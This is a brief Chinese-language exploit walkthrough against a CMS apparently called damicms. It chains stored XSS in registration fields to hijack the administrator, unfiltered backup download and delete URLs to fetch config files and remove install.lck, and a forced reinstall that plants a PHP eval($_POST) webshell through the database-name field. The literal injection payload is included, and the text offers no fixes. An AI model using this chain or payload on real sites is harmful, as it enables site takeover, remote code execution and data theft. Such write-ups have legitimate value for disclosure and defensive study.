首先我们先来说下他的 xss。
几乎没有过滤。(注册帐号,用户信息修改)
我们先来注册个帐号。
注册成功之后我们就不管了 。
坐等管理员去后台查看会员信息。
这样我们就可以登录管理员帐号了。
再来任意文件下载 and 删除。
先备份一下数据库 (数据库命名有规律,可被暴力破解。年月日_4位随机数_1.sql )
我们来查看下 下载以及删除文件的连接。
?m=Backup&a=del&id=20140817_9550_1.sql
?m=Backup&a=down&id=20140817_9550_1.sql
然后去找了一下那两个函数
两个函数都没有进行过滤
我们来下载一下 数据库的 配置文件
查看到之后,我们把install.lck删除掉
然后会提示我们 install.lck已经删除
通过重新安装cms,可以进行写shell。
$source_file为其cms保存的一个模版配置文件,
数据库名
damicms',1=>eval($_POST[c]),'xx'=>'